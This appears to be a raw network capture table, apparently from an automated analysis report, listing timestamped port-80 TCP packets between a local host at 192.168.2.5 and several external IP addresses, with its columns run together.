                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:14.020118952 CET5007180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:14.020148039 CET5007180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:14.025561094 CET805007147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:14.025590897 CET805007147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.880515099 CET805007147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.880718946 CET805007147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.880743980 CET5007180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.880779028 CET5007180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.888673067 CET805007147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.888741970 CET5007180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.897160053 CET5007280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.902703047 CET805007218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.902800083 CET5007280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.902965069 CET5007280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.903019905 CET5007280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.908570051 CET805007218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.908612013 CET805007218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.570225000 CET805007218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.570446014 CET5007280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.577128887 CET805007218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.577313900 CET5007280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.586467028 CET5007380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.592012882 CET805007354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.592130899 CET5007380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.592303991 CET5007380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.592336893 CET5007380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.597836971 CET805007354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.597867966 CET805007354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.427901030 CET805007354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.428179979 CET5007380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.434021950 CET805007354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.434099913 CET5007380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.443380117 CET5007480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.449016094 CET805007418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.449105978 CET5007480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.449295044 CET5007480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.449332952 CET5007480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.454684973 CET805007418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.454740047 CET805007418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.271089077 CET805007418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.271620989 CET5007480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.278964996 CET805007418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.279056072 CET5007480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.288871050 CET5007580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.294321060 CET805007518.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.294435024 CET5007580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.294682026 CET5007580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.294738054 CET5007580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.300026894 CET805007518.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.300057888 CET805007518.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.084760904 CET805007518.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.084997892 CET805007518.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.085071087 CET5007580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.085160971 CET5007580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.098843098 CET5007680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.101341009 CET805007518.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.101401091 CET5007580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.104198933 CET805007647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.104254961 CET5007680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.104408026 CET5007680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.104423046 CET5007680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.109734058 CET805007647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.110299110 CET805007647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.532591105 CET805007647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.533056974 CET5007680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.538985014 CET805007647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.539113998 CET5007680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.547883034 CET5007780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.554702044 CET805007744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.554821014 CET5007780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.555071115 CET5007780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.555151939 CET5007780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.560607910 CET805007744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.560637951 CET805007744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.219712019 CET805007744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.219883919 CET5007780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.226288080 CET805007744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.226361036 CET5007780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.233441114 CET5007880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.238955021 CET805007844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.239029884 CET5007880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.239156008 CET5007880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.239190102 CET5007880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.244942904 CET805007844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.244973898 CET805007844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.907759905 CET805007844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.907954931 CET5007880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.913816929 CET805007844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.913892031 CET5007880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.922235966 CET5007980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.927637100 CET805007918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.927714109 CET5007980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.928023100 CET5007980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.928083897 CET5007980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.933446884 CET805007918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.933631897 CET805007918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.365535021 CET805007918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.365890026 CET5007980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.678330898 CET5007980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.733189106 CET805007918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.733372927 CET5007980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.737296104 CET805007918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.741017103 CET805007918.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.741071939 CET5007980192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:25.502527952 CET6056980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:25.508161068 CET806056918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:25.508285999 CET6056980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:25.508419991 CET6056980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:25.510689020 CET6056980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:25.513751984 CET806056918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:25.518452883 CET806056918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.182507038 CET806056918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.182845116 CET6056980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.188833952 CET806056918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.188905954 CET6056980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.196549892 CET6057080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.202124119 CET806057044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.202234030 CET6057080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.202745914 CET6057080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.202774048 CET6057080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.208062887 CET806057044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.208091974 CET806057044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.872064114 CET806057044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.885288954 CET6057080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.891386032 CET806057044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.891468048 CET6057080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.903745890 CET6057180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.909200907 CET806057113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.909281969 CET6057180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.929936886 CET6057180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.929963112 CET6057180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.935367107 CET806057113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.935581923 CET806057113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.264233112 CET806057113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.264492035 CET6057180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.267072916 CET806057113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.267119884 CET6057180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.268059969 CET806057113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.268114090 CET6057180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.268178940 CET806057113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.268223047 CET6057180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.268692970 CET806057113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.268742085 CET6057180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.272438049 CET806057113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.272468090 CET806057113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.272517920 CET6057180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.421654940 CET6057280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.427211046 CET806057235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.427295923 CET6057280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.427431107 CET6057280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.427459955 CET6057280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.432921886 CET806057235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.432996988 CET806057235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.285726070 CET806057235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.285906076 CET6057280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.292678118 CET806057235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.292736053 CET6057280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.302090883 CET6057380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.307502031 CET806057318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.307579041 CET6057380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.307679892 CET6057380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.307708979 CET6057380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.313499928 CET806057318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.313525915 CET806057318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.716445923 CET806057318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.716639042 CET6057380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.724267006 CET806057318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.724376917 CET6057380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.730722904 CET6057480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.736241102 CET806057418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.736336946 CET6057480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.736444950 CET6057480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.736479998 CET6057480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.741910934 CET806057418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.741940022 CET806057418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:32.563828945 CET806057418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:32.564018965 CET6057480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:32.570528030 CET806057418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:32.570610046 CET6057480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:33.260492086 CET5998680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:33.265948057 CET805998634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:33.266017914 CET5998680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:33.266130924 CET5998680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:33.266156912 CET5998680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:33.271713972 CET805998634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:33.271744967 CET805998634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.118547916 CET805998634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.118751049 CET5998680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.125063896 CET805998634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.125134945 CET5998680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.132667065 CET5998780192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.138355017 CET805998718.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.138439894 CET5998780192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.138528109 CET5998780192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.138571978 CET5998780192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.144108057 CET805998718.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.144222975 CET805998718.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.801428080 CET805998718.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.801671028 CET5998780192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.807804108 CET805998718.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.807879925 CET5998780192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.815819025 CET5998880192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.821239948 CET805998835.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.821336031 CET5998880192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.821470976 CET5998880192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.821496964 CET5998880192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.826900959 CET805998835.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.827095032 CET805998835.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.771967888 CET805998835.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.772171021 CET805998835.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.772182941 CET5998880192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.772241116 CET5998880192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.777889013 CET805998835.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.977440119 CET5998980192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.982969999 CET805998934.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.983059883 CET5998980192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.983169079 CET5998980192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.983206987 CET5998980192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.989787102 CET805998934.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.989830017 CET805998934.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:36.832375050 CET805998934.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:36.832590103 CET5998980192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:36.839827061 CET805998934.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:36.839900970 CET5998980192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.026038885 CET5999080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.032510042 CET805999044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.032748938 CET5999080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.032885075 CET5999080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.032885075 CET5999080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.038243055 CET805999044.221.84.105192.168.2.5
